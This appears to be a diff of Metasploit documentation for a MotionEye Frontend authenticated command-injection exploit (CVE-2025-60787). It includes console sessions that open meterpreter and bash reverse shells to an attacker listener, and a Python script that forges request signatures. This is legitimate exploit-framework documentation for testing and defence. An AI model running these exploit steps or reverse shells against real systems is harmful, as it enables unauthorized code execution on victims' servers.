rapid7
diff --git a/‎documentation/modules/exploit/multi/http/motioneye_auth_rce_cve_2025_60787.md‎
Lines changed: 152 additions & 6 deletions b/‎documentation/modules/exploit/multi/http/motioneye_auth_rce_cve_2025_60787.md‎
Lines changed: 152 additions & 6 deletions
@@ -1,13 +1,16 @@
 ## Vulnerable Application
 
-This module exploits a template injection vulnerability in the MotionEye.
+This module exploits a template injection vulnerability in the [MotionEye Frontend](https://github.com/motioneye-project/motioneye).
 
-MotionEye is vulnerable to OS Command Injection in configuration parameters such as image_file_name. 
-Unsanitized user input is written to Motion configuration files, 
-allowing remote authenticated attackers with admin access to achieve code execution when Motion is restarted.
+MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as `image_file_name`.
+Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.
 
-This vulnerability affects MotionEye versions <= 0.43.1b4 are vulnerable.
-Successful exploitation may result in the remote code execution under the privileges
+Exploit workflow:
+1. Adds a new camera in MotionEye Frontend.
+2. Injects the payload into the image_file_name field (used for naming camera screenshots).
+3. Captures a screenshot, triggering the payload.
+
+Successful exploitation may result in the remote code execution as the user running
 of the web server, potentially exposing sensitive data or disrupting survey operations.
 
 An attacker can execute arbitrary system commands in the context of the user running the web server.
@@ -22,6 +25,8 @@ An attacker can execute arbitrary system commands in the context of the user run
 
 ## Scenario
 
+### cmd/linux/http/x64/meterpreter/reverse_tcp
+
 ```
 msf6 > use exploit/multi/http/motioneye_auth_rce_cve_2025_60787
 [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
@@ -55,4 +60,145 @@ OS           : Debian 13.1 (Linux 6.11.2-amd64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+```
+
+### cmd/unix/reverse_bash
+
+```
+msf6 > use exploit/multi/http/motioneye_auth_rce_cve_2025_60787
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RPORT 9999
+RPORT => 9999
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 0.43.14, which is vulnerable
+[*] Adding camera...
+[+] Camera successfully added
+[*] Setting up exploit...
+[+] Exploit installation completed
+[*] Executing exploit...
+[+] Execution exploit request sent successfully
+[*] Removing camera
+[+] Camera removed successfully
+[*] Command shell session 1 opened (192.168.19.130:4444 -> 172.17.0.2:60160) at 2025-10-06 04:46:34 -0400
+
+cat /etc/os-release
+PRETTY_NAME="Debian GNU/Linux 13 (trixie)"
+NAME="Debian GNU/Linux"
+VERSION_ID="13"
+VERSION="13 (trixie)"
+VERSION_CODENAME=trixie
+DEBIAN_VERSION_FULL=13.1
+ID=debian
+HOME_URL="https://www.debian.org/"
+SUPPORT_URL="https://www.debian.org/support"
+BUG_REPORT_URL="https://bugs.debian.org/"
+```
+
+## Script for signing requests
+
+The application verifies request signatures, so I wrote a small script to sign requests manually.
+
+You won't need it if you use the exploit, but it can be useful for debugging.
+
+```
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+Example of usage:
+```
+python3 ./hash.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body '' --key ""
 ```